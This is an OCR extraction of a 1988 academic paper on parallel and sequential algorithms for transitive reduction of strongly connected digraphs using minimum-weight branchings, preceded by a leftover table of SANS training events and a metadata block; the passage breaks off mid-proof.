<td>Live Event</td>
</tr>
<tr>
<td>SANS Scottsdale 2019</td>
<td>Scottsdale, AZUS</td>
<td>Feb 18, 2019 - Feb 23, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Dallas 2019</td>
<td>Dallas, TXUS</td>
<td>Feb 18, 2019 - Feb 23, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Zurich February 2019</td>
<td>Zurich, CH</td>
<td>Feb 18, 2019 - Feb 23, 2019</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Austin 2018</td>
<td>Online, TXUS</td>
<td>Feb 26, 2018 - Dec 01, 2018</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS OnDemand</td>
<td>Books & MP3s OnlyUS</td>
<td>Anytime</td>
<td>Self Paced</td>
</tr>
</tbody>
</table>
|
{"Source-Url": "https://www.sans.org/reading-room/whitepapers/casestudies/eaudit-designing-generic-tool-review-entitlements-36027", "len_cl100k_base": 15757, "olmocr-version": "0.1.49", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 87493, "total-output-tokens": 16615, "length": "2e13", "weborganizer": {"__label__adult": 0.00032782554626464844, "__label__art_design": 0.0006151199340820312, "__label__crime_law": 0.0008082389831542969, "__label__education_jobs": 0.0021038055419921875, "__label__entertainment": 8.797645568847656e-05, "__label__fashion_beauty": 0.00016033649444580078, "__label__finance_business": 0.0012912750244140625, "__label__food_dining": 0.0002486705780029297, "__label__games": 0.0007562637329101562, "__label__hardware": 0.0009660720825195312, "__label__health": 0.0003058910369873047, "__label__history": 0.00020575523376464844, "__label__home_hobbies": 0.00012946128845214844, "__label__industrial": 0.0004699230194091797, "__label__literature": 0.00019812583923339844, "__label__politics": 0.0002474784851074219, "__label__religion": 0.0002665519714355469, "__label__science_tech": 0.0206451416015625, "__label__social_life": 0.0001251697540283203, "__label__software": 0.0257415771484375, "__label__software_dev": 0.94384765625, "__label__sports_fitness": 0.00021529197692871096, "__label__transportation": 0.00023472309112548828, "__label__travel": 0.0001398324966430664}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58147, 0.0397]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58147, 0.10292]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58147, 0.82122]], "google_gemma-3-12b-it_contains_pii": [[0, 585, false], [585, 1906, null], [1906, 2104, null], [2104, 4451, null], [4451, 6695, null], [6695, 9316, null], [9316, 10680, null], [10680, 12432, null], [12432, 13710, null], [13710, 15109, null], [15109, 16330, null], [16330, 17680, null], [17680, 18279, null], [18279, 19361, null], [19361, 20270, null], [20270, 21984, null], [21984, 22757, null], [22757, 25167, null], [25167, 26297, null], [26297, 27279, null], [27279, 29555, null], [29555, 30087, null], [30087, 30771, null], [30771, 31367, null], [31367, 32481, null], [32481, 33805, null], [33805, 35507, null], [35507, 36603, null], [36603, 36634, null], [36634, 37525, null], [37525, 38300, null], [38300, 41975, null], [41975, 48077, null], [48077, 48868, null], [48868, 49615, null], [49615, 50968, null], [50968, 51659, null], [51659, 52425, null], [52425, 53461, null], [53461, 54271, null], [54271, 58147, null]], "google_gemma-3-12b-it_is_public_document": [[0, 585, true], [585, 1906, null], [1906, 2104, null], [2104, 4451, null], [4451, 6695, null], [6695, 9316, null], [9316, 10680, null], [10680, 12432, null], [12432, 13710, null], [13710, 15109, null], [15109, 16330, null], [16330, 17680, null], [17680, 18279, null], [18279, 19361, null], [19361, 20270, null], [20270, 21984, null], [21984, 22757, null], [22757, 25167, null], [25167, 26297, null], [26297, 27279, null], [27279, 29555, null], [29555, 30087, null], [30087, 30771, null], [30771, 31367, null], [31367, 32481, null], [32481, 33805, null], [33805, 35507, null], [35507, 36603, null], [36603, 36634, null], [36634, 37525, null], [37525, 38300, null], [38300, 41975, null], [41975, 48077, null], [48077, 48868, null], [48868, 49615, null], [49615, 50968, null], [50968, 51659, null], [51659, 52425, null], [52425, 53461, null], [53461, 54271, null], [54271, 58147, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58147, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58147, null]], "pdf_page_numbers": [[0, 585, 1], [585, 1906, 2], [1906, 2104, 3], [2104, 4451, 4], [4451, 6695, 5], [6695, 9316, 6], [9316, 10680, 7], [10680, 12432, 8], [12432, 13710, 9], [13710, 15109, 10], [15109, 16330, 11], [16330, 17680, 12], [17680, 18279, 13], [18279, 19361, 14], [19361, 20270, 15], [20270, 21984, 16], [21984, 22757, 17], [22757, 25167, 18], [25167, 26297, 19], [26297, 27279, 20], [27279, 29555, 21], [29555, 30087, 22], [30087, 30771, 23], [30771, 31367, 24], [31367, 32481, 25], [32481, 33805, 26], [33805, 35507, 27], [35507, 36603, 28], [36603, 36634, 29], [36634, 37525, 30], [37525, 38300, 31], [38300, 41975, 32], [41975, 48077, 33], [48077, 48868, 34], [48868, 49615, 35], [49615, 50968, 36], [50968, 51659, 37], [51659, 52425, 38], [52425, 53461, 39], [53461, 54271, 40], [54271, 58147, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58147, 0.27066]]}
|
olmocr_science_pdfs
|
2024-11-26
|
2024-11-26
|
ef1ab56fd5199ce0e241ec706b68fbdc0671a60e
|
TRANSITIVE REDUCTION IN PARALLEL VIA BRANCHINGS
Phillip Gibbons
Richard Karp
Vijaya Ramachandran
Danny Soroker
Robert Tarjan
CS-TR-171-88
July 1988
TRANSITIVE REDUCTION IN PARALLEL VIA BRANCHINGS
Phillip Gibbons* Richard Karp*†
Computer Science Division, University of California, Berkeley, CA
Vijaya Ramachandran*‡
Coordinated Science Lab., University of Illinois, Urbana, IL
Danny Soroker*
IBM Almaden Research Center, San Jose, CA
Robert Tarjan$§
Computer Science Dept., Princeton University, Princeton, NJ
and AT&T Bell Labs., Murray Hill, NJ
July 15, 1988
ABSTRACT
We study the following problem: given a strongly connected digraph, find a minimal strongly connected spanning subgraph of it. Our main result is a parallel algorithm for this problem, which runs in polylog parallel time and uses $O(n^2)$ processors on a PRAM. Our algorithm is simple and the major tool it uses is computing a minimum-weight branching with zero-one weights. We also present sequential algorithms for the problem that run in time $O(m+n\cdot\log n)$.
* Supported in part by the International Computer Science Institute, Berkeley, California.
† Also supported by NSF grant CCR-8411954.
‡ Also supported by Joint Services Electronics Program under N00014-84-C-0149.
§ Supported in part by NSF grant DCR-8605962 and ONR contract N00014-87-K-0457.
1. Introduction
The transitive reduction problem for strongly connected digraphs is: given a strongly connected digraph $G$, find a minimal strongly connected spanning subgraph of it, i.e., a strongly connected spanning subgraph for which the removal of any arc destroys strong connectivity. We are looking for a minimal subgraph because the problem of finding a minimum subgraph with the same transitive closure is NP-hard [GJ].
There is an obvious sequential algorithm for solving this problem: scan the arcs one by one; at step $i$ test if the $i$-th arc can be removed without destroying strong connectivity. If so, remove it and update the digraph. This algorithm has complexity $O((n+m)^2)$, where $n$ is the number of vertices of the input graph and $m$ is the number of arcs. A simple modification is to initially reduce the number of arcs to at most $2n-2$ by taking the union of a forward and an inverse branching (defined below). This reduces the running time to $O(n^2)$.
The problem studied here is reminiscent of the well-studied problem of finding a maximal independent set of vertices in a graph, for which several parallel algorithms have appeared in the literature ([KW],[Lu],[ABI],[GS]). Two common features are that there is a simple sequential algorithm for it that seems hard to parallelize and that the related optimization problem (minimum vs. minimal) is NP-hard.
We can define the following independence relation on the arcs of a strongly connected digraph, $G$: a set of arcs is independent if it can be removed without destroying strong connectivity of $G$. Using this definition, finding a transitive reduction of $G$ is equivalent to removing a maximal independent sets of arcs from $G$. A property that sets our problem apart from the maximal independent set problem is that in our case independence of a set is not guaranteed when every pair of elements in it is independent.
Our problem can be expressed as the determination of a maximal independent set in an independence system as defined by Karp, Upfal and Wigderson ([KUW]). The problem computed by a "rank oracle" in this case is NP-hard, but an "independence oracle" is easy to compute in NC. Following the method described in [KUW] this automatically yields a randomized parallel algorithm that uses a polynomial number of processors and runs in time $O(\sqrt{n} \cdot \log^c n)$ (for some constant $c$).
In this paper we present parallel and sequential algorithms for this problem. Our first parallel algorithm runs in time $O(\log^5 n)$ and uses $O(n^3)$ processors on a CREW PRAM. We then present an improved implementation of one of the steps in the algorithm that leads to a parallel algorithm that runs in $O(\log^4 n)$ time with the same processor bound. Both of these algorithms can be speeded up by a $\log n$ factor if we use a CRCW PRAM; we assume here the COMMON
concurrent-write model in which all processors participating in a concurrent write must write the same value [KR]. The processor bound of $O(n^3)$ represents the number of processors needed to multiply two $n$ by $n$ matrices in $O(\log n)$ time on a CREW PRAM by the straightforward parallel matrix multiplication algorithm. It is possible that the processor bound can be improved by using sophisticated techniques for multiplying $n$ by $n$ matrices (see e.g., [CW]); we do not elaborate on this.
The major tool that our algorithms use is computing a minimum-weight branching with zero-one weights. Central to our algorithms is a proof that two suitable applications of this tool are guaranteed to reduce by half the number of arcs still to be removed. We also present two sequential algorithms for the problem, each of which runs in time $O(m+n\cdot \log n)$. This is an improvement over the straightforward algorithm mentioned above.
The transitive reduction problem is, in some sense, a dual of the minimum strong augmentation problem - add a minimum set of arcs to a digraph to make it strongly connected. A linear time sequential algorithm was given for this problem by Eswaran and Tarjan ([ET]), and a parallel algorithm running in $O(\log n)$ time with $O(n^3)$ processors on a CRCW PRAM was given by Soroker ([So]).
Our problem extends naturally to general digraphs: given a digraph $G$, find a minimal spanning subgraph of it whose transitive closure is the same as that of $G$. A sequential algorithm for this problem in the case that $G$ is acyclic is given in [AGU] and can be parallelized in a straightforward manner. Combining it with our algorithms we obtain parallel algorithms (with the same complexities as stated above) for the transitive reduction problem on general digraphs. We point out that these parallel algorithms are good with respect to the state of the art, since the problem solved is at least as hard as testing reachability from one vertex to another in a digraph, and the best NC algorithm currently known for this requires on the order of $M(n)$ processors, where $M(n)$ is the number of processors needed to multiply two $n$ by $n$ Boolean matrices in $O(\log n)$ time.
We note that the name "transitive reduction" was given to a different problem by Aho, Garey and Ullman ([AGU]), and should not be confused with our definition. Given a digraph $G$, they ask for a digraph with a minimum number of arcs (not necessarily a subgraph of $G$) whose transitive closure is the same as that of $G$. This definition agrees with ours when $G$ is acyclic.
Definitions
Let $G$ be a strongly connected digraph. A forward (inverse) branching rooted at $x$ is a spanning tree of $G$ in which $x$ has in-degree (out-degree) zero and all other vertices have in-degree (out-degree) one. A branching is either a forward or an inverse branching. Throughout this paper the root, $x$, will be some (arbitrarily) fixed vertex of the input digraph, and the set of all
branchings will be taken to be only those rooted at $x$.
An arc, $e$, is **G-redundant** (or simply **redundant** when the graph is clear) if $G-(e)$ is strongly connected. Arc $e$ is **G-essential** (or **essential**) if it is not redundant. Let $H$ be a subgraph of $G$. Let $\text{rc}(H)$ denote the number of $G$-redundant arcs in $H$. When $H=G$ we will use the shorthand $r(G)$.
An **H-philic** ($H$-phobic) branching in $G$ is one that has the greatest (smallest) number of arcs in common with $H$ over all branchings (rooted at $x$) in $G$.
Our model of parallel computation is the Parallel Random Access Machine (PRAM), which consists of a collection of independent processing elements communicating through a shared memory. For a survey on the PRAM model and PRAM algorithms see [KR].
2. The Transitive Reduction Algorithm
Our basic algorithm is based solely on computing philic and phobic branchings. The following lemma explains how these branchings are computed:
**Lemma 0:** An $H$-philic ($H$-phobic) branching can be computed by a minimum-weight branching computation with zero-one weights.
**Proof:** Assign weight 0 (1) to every arc in $H$ and weight 1 (0) to all other arcs. []
Such a minimum-weight branching can be computed in time $O(\log^2 n)$ using $O(n^3)$ processors on a CRCW PRAM by Lovasz’s method ([Lo]). On a CREW PRAM, this algorithm runs in $O(\log^3 n)$ time.
**Proposition 1:** An arc of $G$ is essential if and only if it is the unique arc crossing some directed cut of $G$.
**Proposition 2:** The union of a forward branching and an inverse branching of $G$ is a strongly connected spanning subgraph of $G$.
**Proposition 3:** Let $G'$ be a strongly connected spanning subgraph of $G$. Then $e$ is $G'$-redundant only if it is $G$-redundant.
**Lemma 1:** Let $F$ be a forward branching in $G$ and let $I$ be an $F$-philic inverse branching in $G$. Let $G'=F \cup I$. Then the arcs of $I-F$ are all $G'$-essential.
Proof: Let \( e \in I - F \). Assume \( G' - \{ e \} \) contains some inverse branching, \( I' \). Then \( I' \) has one more arc in common with \( F \) than \( I \) does (since all branchings have the same number of arcs). But this contradicts the fact that \( I \) is \( F \)-philic. Thus \( G' - \{ e \} \) contains no inverse branching and is therefore not strongly connected. []
A cut leaving \( S \) is the set of arcs extending from \( S \) to \( V(G) - S \) in a digraph, \( G \), and its cardinality is denoted by \( \delta_G(S) \).
**Theorem 1 (Edmonds' Branching Theorem ([Ed])):**
Let
\[
k = \min \{ \delta_G(S) \mid x \in S, S \not\supset V(G) \}.
\]
Then \( G \) contains \( k \) arc-disjoint forward branchings (rooted at \( x \)).
**Lemma 2:** For every strongly connected digraph, \( G \), there exists a forward branching, \( F \), of \( G \) such that \( r_G(F) \leq \frac{1}{2} r(G) \).
**Proof:** Let \( G' \) be obtained from \( G \) by duplicating all essential arcs. Let \( S \) be a proper subset of \( V(G) \) containing x. We claim that \( \delta_{G'}(S) \geq 2 \). This is because the cut leaving \( S \) must contain at least one duplicated essential arc of \( G \) or at least two redundant arcs (by proposition 1). Therefore, by theorem 1, there are two arc-disjoint forward branchings in \( G' \) (each corresponding to a branching in \( G \)), one of which must contain at most half of the (unduplicated) \( G \)-redundant arcs.[]
**Theorem 2:** Let \( R \) be the set of redundant arcs in \( G \). Let \( F \) be an \( R \)-phobic forward branching and let \( I \) be an \( F \)-philic inverse branching. Let \( G' = F \cup I \). Then \( r(G') \leq \frac{1}{2} r(G) \).
**Proof:** First note that by proposition 2, \( G' \) is strongly connected. By lemma 2 and proposition 3, \( r_G(F) \leq r_G(F) \leq \frac{1}{2} r(G) \). By lemma 1, \( r(G') = r(G) \). Therefore \( r(G') \leq \frac{1}{2} r(G) \). []
It is an immediate consequence of theorem 2 that the following NC algorithm gives a transitive reduction of \( G \):
**Repeat**
1. \( R \leftarrow \) set of redundant arcs in \( G \)
2. \( F \leftarrow R \)-phobic forward branching in \( G \)
3. \( I \leftarrow F \)-philic inverse branching in \( G \)
4. \( G \leftarrow F \cup I \)
until \( R = \emptyset \)
(5) output \( G \) (it is a transitive reduction of the input digraph)
By Theorem 2 the repeat loop runs \( O(\log n) \) times, where \( n \) is the number of vertices in \( G \). Steps (2) and (3) are implemented with Lovasz's minimum-weight branching algorithm (lemma 0). The straightforward implementation of step (1) is to perform a strong connectivity test (transitive closure) with each vertex of the graph deleted in turn, which requires \( n \cdot M(n) \) processors. In the next section we shall show how to perform this step more efficiently.
3. Efficient Classification of Arcs
In this section we give parallel algorithms to classify the arcs of \( G \) as essential or redundant in poly-log time using only \( O(n^3) \) processors. In section 3.1 we provide a simple polylog time parallel algorithm using \( O(n^3) \) processors. In section 3.2 we provide a faster algorithm using tree contraction [MR].
3.1. Finding Redundant Arcs Using Minimum Weight Branchings
Let \( E_f \) (\( E_i \)) be the set of essential arcs contained in all forward (inverse) branchings. It follows from proposition 2 that:
**Proposition 4:** An arc is essential if it is either in \( E_f \) or in \( E_i \) (or both).
**Lemma 3:** Let \( H \) be a set of arcs containing \( E_f \) and let \( F \) be an \( H \)-phobic forward branching in \( G \). Then \( |(F \cap H) - E_f| \leq \frac{1}{2} |H - E_f| \).
**Proof:** Let \( G' \) be obtained from \( G \) by duplicating all the arcs in \( E_f \). As in lemma 2, there exist two arc-disjoint forward branchings in \( G' \) (corresponding to branchings in \( G \)), one of which contains at most half the arcs of \( H - E_f \).
Therefore \( E_f \) (and similarly \( E_i \)) can be computed by the following algorithm:
1. \( H \leftarrow G \)
2. repeat steps (2) and (3) \( \lceil \lg m \rceil \) times
(2) $F \leftarrow H$-phobic forward branching in $G$
(3) $H \leftarrow H \cap F$
(4) output $H$ (this is the set $E_f$)
This algorithm requires $\log n$ applications of Lovasz’s minimum weight branching algorithm, which runs in $O(\log^2 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors. Thus we can use this algorithm to find all redundant arcs in $O(\log^3 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors. This in turn leads to a transitive reduction algorithm that runs in $O(\log^4 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors.
3.2. Finding Redundant Arcs Using Tree Contraction
Let $r$ be a fixed root of a directed graph $G=(V,E)$. We call arc $(v,w)$ an out-bridge if $(v,w)$ is on every path from $r$ to $w$, and an in-bridge if $(v,w)$ is on every path from $v$ to $r$. Let $O$ be the set of out-bridges of $G$, and $I$ the set of in-bridges of $G$. Then the set of redundant arcs is the set $E - (I \cup O)$.
Let $B$ be a forward branching rooted at $r$. Then every out-bridge of $G$ lies in $B$. We can view $B$ as a rooted directed tree $B=(V,E',r)$. For a vertex $v$ in $V -\{r\}$, we denote by $\text{parent}(v)$, the parent of $v$ in $B$. A vertex $v$ is active if there is a path from $r$ to $v$ that avoids arc $(\text{parent}(v),v)$. Similarly, a non-tree arc $(w,v)$ is active if it lies on a path from $r$ to $v$ that avoids arc $(\text{parent}(v),v)$.
Lemma 4: Let $B=(V,E',r)$ be a forward branching in a directed graph $G$. A tree arc $e=(\text{parent}(v),v)$ in $B$ is an out-bridge of $G$ if and only if $v$ is not active.
Proof: If $e$ is an out-bridge of $G$ then every path from $r$ to $v$ passes through $e$. Thus $v$ cannot be active. Conversely, if $e$ is not an out-bridge, then there exists a path from $r$ to $v$ that avoids $e$ and hence $v$ must be active.[1]
We now give an algorithm to identify all active vertices, and hence all out-bridges, using tree contraction [MR]. An analogous computation on an inverse branching rooted at $r$ gives the in-bridges, from which we can compute the redundant arcs in $G$.
We shall use a variant of tree contraction proposed in [Ra] in which the basic operation is shrink, which we now define. A leaf chain in a rooted tree $T=(V,E,r)$ is a path $<v_1, \ldots, v_l>$ such that each $v_i, i > 1$ has exactly one incoming arc and one outgoing arc in $T$, $v_1$ has either no incoming arc or more than one outgoing arc in $T$, and $v_l$ is a leaf in $T$. We will call $v_1$ the root, and $v_l$
the leaf of the leaf chain. Note that every leaf in $T$ is part of a leaf chain, possibly a degenerate one (if $l=2$).
The shrink operation applied to a rooted tree $T=(V,E,r)$ removes all vertices in each leaf chain in $T$ except the root of the leaf chain. It can be shown that $O(\log n)$ applications of the shrink operation suffice to reduce any $n$-node tree to a single node [Ra].
We now develop an algorithm Shrink(P) for identifying out-bridges for the case when the forward branching is a simple path. We shall then use this to find the out-bridges in leaf chains while implementing the shrink operation in a tree contraction algorithm to find out-bridges in $G$ given an arbitrary forward branching.
The input to algorithm Shrink(P) is a directed graph $P=(V,E)$ consisting of a directed path $p=<1,2,\cdots,t>$, together with a collection of forward arcs of the form $(i,j), i<j$, and a collection of back arcs of the form $(i,j), i>j$. The algorithm Shrink(P) will identify all active vertices, thereby giving the out-bridges in $p$. Note that $P$ is allowed to have two arcs of the form $(i,i+1)$, one of which is a forward arc and the other lies in $p$. We will need this when we apply algorithm Shrink(P) to the general problem of finding out-bridges in a graph with an arbitrary forward branching.
We now make a series of observations.
**Observation 1:** Every forward arc is active.
Let $p(u)$ be the subgraph of $G$ induced by vertices $u$ through $t$. For each vertex $v$ in $p(u)$, let $v\rightarrow u$ if $u$ is reachable from $v$ in $p(u)$. Let $reach(u)$ be the set of vertices $v$ in $p(u)$ with $v\rightarrow u$.
**Observation 2:** $reach(u)$ is a single interval of the form $[u,u']$. Further a vertex $v\neq u$ is in $reach(u)$ if and only if there exists a sequence of back arcs $b_i=(u_i,v_i), i=1,\cdots,k$ such that $v_1=u$, $u_k\geq v$, and $u_1\geq v_{i-1}, i=1,\cdots,k-1$.
**Lemma 5:** A vertex $u$ is active if and only if there is a forward arc $(k,l)$ with $k<u$ and $l$ in $reach(u)$.
**Proof:** Let $u$ be an active vertex. Then there is a path $q$ from the root to $u$ that avoids arc $(u-1,u)$. This in turn implies that $q$ must contain a forward arc $f=(k,l)$ with $k<u$, $l\geq u$ and with $u$ reachable from $l$ using only arcs in $p(u)$. Hence $l$ must be in $reach(u)$.
Conversely suppose there is a forward arc $f=(k,l)$ with $k<u$ and $l$ in $reach(u)$. Hence there is a path $q$ from $l$ to $u$ using only arcs in $p(u)$. Then the path consisting of arcs in $p$ from the root to $k$, followed by arc $f$ and then the path $q$ is a path from 1 to $u$ that avoids arc $(u-1,u)$. Hence $u$ must be an active vertex.[]
Observations 1 and 2 and Lemma 5 together give us the following algorithm to find all out-bridges when the forward branching is a simple path.
Shrink(P);
1. Find $reach(u)$ for each vertex $u$ as follows:
a) For each back arc $b=(i,j)$ find a back arc $next(b)=(i',j')$ with $j'$ in $[j,i]$ and maximum $i'$. If $i'\leq i$ then set $next(b)=\phi$.
b) Form an auxiliary graph with a vertex for each back arc $b$ and an arc from $b$ to $next(b)$, if $next(b)$ exists. This auxiliary graph is a forest of trees.
c) For each vertex $u$, pick some back arc $b=(v,u)$ incident on $u$, and find the root $b'$ of the tree it belongs to. Let $b'$ be the back arc $(x,y)$. Set $reach(u)=[u,x]$.
If there is no back arc incident on $u$ set $reach(u)=[u,u]$.
2. For each vertex $u$, find a forward arc $f=(k,l)$ with $l$ in $reach(u)$ and with minimum $k$. If $k<u$ mark $u$ as active.
3. For each vertex $u$ that is not active, mark $(p(u),u)$ as an out-bridge.
We now show how to implement each of the steps in the algorithm efficiently in parallel. Step 3 can be implemented trivially in constant time with $t$ processors. The following method implements step 2 in $O(\log t)$ time with a number of processors linear in the size of $P$: Initially we determine, for each vertex $u$, the forward arc $(v,u)$ with minimum $v$ (if such an arc exists). It is straightforward to compute this in $O(\log t)$ time with a linear number of processors. Then by a doubling computation we compute, for each interval $[u,u+2^j],1\leq j \leq \lceil \log t \rceil,1\leq u \leq t-2^j$, the forward arc $(v,x)$ with minimum $v$ such that $x$ is in the interval $[u,u+2^j]$. This computation can be done in $O(\log r)$ time with a linear number of processors on a CREW PRAM. Any interval $[i,j],1\leq i < j \leq t$ can be written as the overlapping union of two of the previously computed intervals, and hence each vertex can now find a forward arc as required in step 2 in constant time.
Step 1 can be implemented in $O(\log t)$ time with a linear number of processors on a CREW PRAM as follows. Step 1a can be performed in a manner analogous to step 2. Step 1b can be implemented in constant time with a linear number of processors. Step 1c can be implemented by pointer jumping in $O(\log t)$ time with a linear number of processors. Thus we have a parallel algorithm for Shrink(P) that runs in $O(\log t)$ time with a linear number of processors on a CREW PRAM.
We now incorporate the Shrink algorithm in the following tree contraction algorithm that finds the out-bridges in an arbitrary forward branching of a directed graph $G$ rooted at $r$. The algorithm constructs a sequence of pairs $(G_k,T_k)$, where $G_k$ is a digraph and $T_k$ is a forward branching; $G_1$ is the input digraph and $T_1$ is a forward branching of $G$ rooted at a fixed vertex $r$. Iteration $k$ identifies the leaf chains of $T_k$, determines the out-bridges of $G_k$ within those leaf chains, deletes all the vertices of the leaf chains except their roots, and then performs a transitive
closure computation and adds appropriate arcs to ensure that the out-bridges in $G_{k+1}$ are precisely the out-bridges of $G$ not yet identified.
\[ \text{Outbridges}(G=(V,E,r),T); \]
**Input:** A directed graph $G=(V,E)$ with a forward branching $T$ rooted at $r$; $|V|=n$.
**Repeat**
1. **Find out-bridges in the leaf chains of $T$:**
For each leaf chain $l$ in $T$ pardo
Let $t$ be the root of $l$ and $t'$ the leaf of $l$. Let $L'$ be the subgraph of $G$ induced by vertices in $l$.
a) Form $L$ from $L'$ by introducing a forward arc $(t,y)$ for each non-tree arc $(x,y)$ in $G$ with $y$ in $V(l) - \{t\}$ and $x$ not in $V(l)$.
b) Apply Shrink$(L)$ to find the out-bridges in $L$ and label these as out-bridges of $G$.
2. **Remove leaf chains from $T$:**
a) Form the graph $H$ with vertex set $V$ and arc set the arcs in all leaf chains and all non-tree arcs of $G$.
b) Form $M$, the adjacency matrix of $H$, and form the transitive closure $M^*$ of $M$.
c) For each vertex $v$, determine, using $M^*$, the set of vertices from which $v$ is reachable in $H$. For each such vertex $w$, introduce an arc $(w,v)$ in $G$.
d) For each vertex $t$ that is the head of some leaf chain, delete all incoming non-tree arcs to proper descendants of $t$. Collapse all of these proper descendants into $t$. Delete any self-loops in this graph.
until $T=\emptyset$
Generalizing our earlier notation for the case when the forward branching is a simple path, we now let $p(u)$ be the subgraph of $G$ induced by those vertices that lie in the subtree of $T$ rooted at $u$. For each vertex $v$ in $p(u)$, let $v\rightarrow u$ if $u$ is reachable from $v$ in $p(u)$. Let $reach(u)$ be the set of vertices $v$ in $p(u)$ with $v\rightarrow u$.
The following lemma is a straightforward generalization of Observation 2 and Lemma 5 (here a vertex $v$ is a descendant of a vertex $u$ if $u=v$ or if there is a directed path from $u$ to $v$ in $T$; otherwise $v$ is a non-descendant of $u$).
**Lemma 6:** A vertex $u$ in $G$ is active if and only if there is an arc $(x,y)$ with $x$ a non-descendant of $u$ and with $y$ in $reach(u)$.
Let $G$ be a directed graph with a forward branching $T$ rooted at $r$, and let $v$ be a vertex in $G$. An active path to $v$ is a path $p$ from $r$ to $v$ consisting of an initial path $p'$ using tree arcs from $r$ to a non-descendant $x$ of $v$ followed by an intermediate path consisting of a single non-tree arc $a$ from $x$ to a descendant $y$ of $v$ followed by a final path $p''$ from $y$ to $v$ using only arcs connecting descendants of $v$.
Observation 3: Vertex $v$ is active if and only if there is an active path to $v$.
We now prove some lemmas that will allow us to establish the correctness of algorithm Outbridges. As before let $G_i$ and $T_i$ be the graph and forward branching present at the start of the $i$th iteration of the repeat loop in the algorithm; hence $G_1$ and $T_1$ are the input graph together with its forward branching, and $G_k$ and $T_k$ are the current graph and forward branching at the start of the $k$th iteration. Similarly let $H_i$ be the graph $H$ of step 2a of algorithm Outbridges constructed in the $i$th iteration of the repeat loop.
We first note that Observation 2 remains valid in each $G_k$ when $u$ is a vertex in a leaf chain of $T_k$. We state this in the following observation.
Observation 4: Let $u$ be a vertex in a leaf chain $l$ of forward branching $T$, where for convenience we assume that the vertices in the leaf chain are numbered from 1 to $s$, with 1 the root of the leaf chain and $s$ the leaf of the leaf chain. Then $\text{reach}(u)$ is a single interval of the form $[u, u']$. Further, a vertex $v \neq u$ is in $\text{reach}(u)$ if and only if there exists a sequence of back arcs $b_i = (v_i, v_{i+1}), i = 1, \ldots, k$ in $L$ (where $L$ is the subgraph of $G$ induced by vertices in $l$) such that $v_1 = u$, $u_i \geq v$, and $u_i \geq v_{i+1}$, $i = 1, \ldots, k - 1$.
Lemma 7: For each $k \geq 1$, algorithm Outbridges correctly finds the out-bridges in the leaf chains of $G_k$.
Proof: By Observation 4, for a vertex $u$ in a leaf chain $l$ of $T_k$, $\text{reach}(u)$ in $G_k$ is the same as $\text{reach}(u)$ in the subgraph of $G_k$ induced by $l$. Hence the reach value of each vertex in the leaf chain is correctly computed in the Shrink computation of step 1b in algorithm Outbridges.
By Lemma 6, a vertex $u$ in a leaf chain is active if and only if there is an arc $e = (x, y)$ in $G_k$ with $x$ a non-descendant of $u$ and with $y$ in $\text{reach}(u)$. Such an arc $e$ is either a forward arc in the leaf chain or is an arc with $x$ not in the leaf chain and $y$ in the leaf chain. The former case is the same as that used in the Shrink algorithm. In the latter case, $(x, y)$ will cause any vertex $u$ in the leaf chain with $y$ in $\text{reach}(u)$ to be active. Hence for the purpose of the Shrink algorithm this is equivalent to having an arc from the root, $t$, of the leaf chain to $y$. Thus the computation in steps 1a and 1b of algorithm Outbridges correctly finds the outbridges in the leaf chains of $G_k$.
Lemma 8 Let $e = (u, v)$ be an out-bridge in $G_{k-1}$ for $k > 1$. Then $e$ is an out-bridge in $G_{k-1}$.
Proof: First note that if $e$ is an out-bridge in $G_k$, then $e$ lies in $T_k$. Hence $e$ lies in $T_{k-1}$, since every tree arc in $T_k$ is present as a tree arc in $T_{k-1}$.
Suppose \( e \) is not an out-bridge in \( G_{k-1} \). Hence \( v \) is an active vertex in \( G_{k-1} \). Let \( p \) be an active path to \( v \) in \( G_{k-1} \), and let \( p \) consist of an initial tree path \( p' \) to a vertex \( x \) that is a non-descendant of \( v \), followed by a non-tree arc \( a=(x,y) \), where \( y \) is a descendant of \( v \), followed by a final path \( p'' \) from \( y \) to \( v \) using only arcs connecting vertices that are descendants of \( v \). We now establish that there must be an active path to \( v \) in \( G_k \), contradicting the assumption that \( e \) is an out-bridge of \( G_k \), and thereby establishing the lemma.
If \( p \) contains no vertex in \( G_{k-1}-G_k \) then \( p \) is an active path to \( v \) in \( G_k \) as well. If \( p \) contains some vertices in \( G_{k-1}-G_k \) then consider the last vertex \( z \) on \( p \) such that \( z \) is in \( G_{k-1}-G_k \).
